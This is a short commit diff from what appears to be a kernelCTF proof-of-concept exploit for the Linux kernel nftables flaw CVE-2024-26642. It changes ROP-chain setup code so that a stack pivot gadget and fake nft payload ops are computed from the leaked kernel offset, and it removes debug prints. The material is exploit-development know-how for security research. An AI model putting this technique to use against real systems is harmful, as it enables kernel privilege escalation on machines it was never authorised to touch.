File tree 2 files changed +2
-4
lines changed
pocs/linux/kernelctf/CVE-2024-26642_mitigation/exploit/mitigation-v3-6.1.55
2 files changed +2
-4
lines changed Original file line number Diff line number Diff line change @@ -185,17 +185,15 @@ void setup_registers(struct payload* payload, int64_t kernel_off) {
185185 // essentially we copy a stack pivot gadget into them
186186 // the payload will be copied directly from the packet we send to trigger the payload
187187
188- * (u64 * )((u8 * )rop_chain_rsi + 0xF ) = pop_rsp_add_rsp_0x20_pop_rbx ;//kernel_off + POP_RSP_ADD_RSP_0X20_POP_RBX_RET;
189- printf ("%llx\n" , pop_rsp_add_rsp_0x20_pop_rbx );
190- printf ("%llx\n" , * (u64 * )((u8 * )rop_chain_rsi + 0xF ));
188+ * (u64 * )((u8 * )rop_chain_rsi + 0xF ) = kernel_off + POP_RSP_ADD_RSP_0X20_POP_RBX_RET ;
191189 const u32 * regs = rop_chain_rsi ;
192190 int j = 0 ;
193191 for (int i = 0 ; i < 6 ; i ++ ) {
194192 if (regs [i ] == 0 ) {
195193 continue ;
196194 }
197195
198- payload -> fast_exprs [j ].fast_ops = nft_payload_fast_ops ; // kernel_off + NFT_PAYLOAD_FAST_OPS;
196+ payload -> fast_exprs [j ].fast_ops = kernel_off + NFT_PAYLOAD_FAST_OPS ;
199197 payload -> fast_exprs [j ].base = NFT_PAYLOAD_NETWORK_HEADER ;
200198 // offset of our skb payload data
201199 payload -> fast_exprs [j ].offset = 0x1c + i * 4 ;
You can’t perform that action at this time.
0 commit comments